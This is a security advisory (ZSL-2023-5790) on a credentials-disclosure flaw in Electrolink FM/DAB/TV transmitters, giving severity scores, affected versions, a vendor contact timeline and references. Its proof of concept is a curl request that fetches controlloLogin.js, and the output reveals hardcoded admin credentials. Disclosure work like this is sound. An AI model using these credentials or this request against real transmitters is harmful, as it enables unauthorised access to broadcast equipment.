Gjoko KrsticZSL-2023-5790Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
8.7 High
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N
7.2 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Title: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
Advisory ID: ZSL-2023-5790
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, Exposure of System Information, Exposure of Sensitive Information
Risk: (5/5)
Release Date: 30.09.2023
Summary
Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system.
FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available.
Description
The device is vulnerable to a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access.
Vendor
Electrolink s.r.l. - <https://www.electrolink.com>
Affected Version
10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Tested On
Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vendor Status
[30.06.2023] Vulnerability discovered.
[02.07.2023] Vendor contacted.
[16.08.2023] No response from the vendor.
[17.08.2023] Vendor contacted.
[29.09.2023] No response from the vendor.
[30.09.2023] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://packetstormsecurity.com/files/174875/>
[2] <https://cxsecurity.com/issue/WLB-2023100007>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275370>
[4] <https://www.exploit-db.com/exploits/51771>
[5] <https://nvd.nist.gov/vuln/detail/CVE-2024-3742>
[6] <https://vulners.com/cve/CVE-2024-3742>
[7] <https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-02>
Changelog
[30.09.2023] - Initial release
[03.11.2023] - Added reference [1] and [2]
[14.02.2024] - Added reference [3] and [4]
[17.04.2024] - Added reference [5], [6] and [7]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The device is vulnerable to a disclosure of clear-text
credentials in controlloLogin.js that can allow security
bypass and system access.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5790
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
30.06.2023
--
C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"
function verifica() {
var user = document.getElementById('user').value;
var password = document.getElementById('password').value;
//alert(user);
if(user=='admin' && password=='cozzir'){
SetCookie('Login','OK',exp);
window.location.replace("FrameSetCore.html");
}else{
SetCookie('Login','NO',exp);
window.location.replace("login.html");
}
}
</p></body></html>Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
8.7 High
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N
7.2 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%